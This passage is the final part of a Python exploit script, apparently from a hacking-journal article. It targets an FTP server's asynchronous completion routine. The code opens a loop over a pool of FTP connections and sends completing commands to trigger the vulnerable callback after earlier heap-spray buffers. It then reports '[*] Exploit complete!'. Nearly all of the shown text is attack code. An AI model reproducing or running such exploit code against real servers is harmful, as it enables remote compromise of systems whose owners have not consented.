(chr(curr_char) * 0x170)". ####################################################################### print "[*] Sending completing commands" start = 0 end = CONNCOUNT print "Total completions: %d" % (end - start) for i in range(start, end): name = "ftpcmd" + str(i) print name connpool.realloc(name, "\n") ####################################################################### #By waiting to exit, we will ensure that the AsyncCompletionRoutine is #NOT called due to the socket closing. It shouldn't matter, since #we've already triggered it above, but just to be safe ####################################################################### print "[*] Exploit complete!" print "Press enter to exit" val = sys.stdin.readline() if __name__ == "__main__": main() --[ EOF